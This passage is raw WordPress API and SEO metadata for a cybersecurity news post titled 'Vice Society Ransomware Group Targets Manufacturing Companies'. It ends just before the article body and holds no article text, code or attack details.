by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Vice Society Ransomware Group Targets Manufacturing Companies\",\"datePublished\":\"2023-01-24T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/\"},\"wordCount\":1558,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/vice-society-ransomware-group-targets-manufacturing-companies.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Ransomware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/\",\"name\":\"Vice Society Ransomware Group Targets Manufacturing Companies 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/vice-society-ransomware-group-targets-manufacturing-companies.jpg\",\"datePublished\":\"2023-01-24T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/vice-society-ransomware-group-targets-manufacturing-companies.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/vice-society-ransomware-group-targets-manufacturing-companies.jpg\",\"width\":1430,\"height\":524},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/vice-society-ransomware-group-targets-manufacturing-companies\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Vice Society Ransomware Group Targets Manufacturing Companies\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Vice Society Ransomware Group Targets Manufacturing Companies 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/","og_locale":"en_US","og_type":"article","og_title":"Vice Society Ransomware Group Targets Manufacturing Companies 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-01-24T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/vice-society-641.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Vice Society Ransomware Group Targets Manufacturing Companies","datePublished":"2023-01-24T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/"},"wordCount":1558,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/vice-society-ransomware-group-targets-manufacturing-companies.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Ransomware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/","url":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/","name":"Vice Society Ransomware Group Targets Manufacturing Companies 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/vice-society-ransomware-group-targets-manufacturing-companies.jpg","datePublished":"2023-01-24T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/vice-society-ransomware-group-targets-manufacturing-companies.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/vice-society-ransomware-group-targets-manufacturing-companies.jpg","width":1430,"height":524},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Vice Society Ransomware Group Targets Manufacturing Companies"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/50244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=50244"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/50244\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/50245"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=50244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=50244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=50244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":50244,"date":"2023-01-24T00:00:00","date_gmt":"2023-01-24T00:00:00","guid":{"rendered":"urn:uuid:6eefbdf5-e7fd-869d-ea9b-414d8fc331d8"},"modified":"2023-01-24T00:00:00","modified_gmt":"2023-01-24T00:00:00","slug":"vice-society-ransomware-group-targets-manufacturing-companies","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/","title":{"rendered":"Vice Society Ransomware Group Targets Manufacturing Companies"},"content":{"rendered":"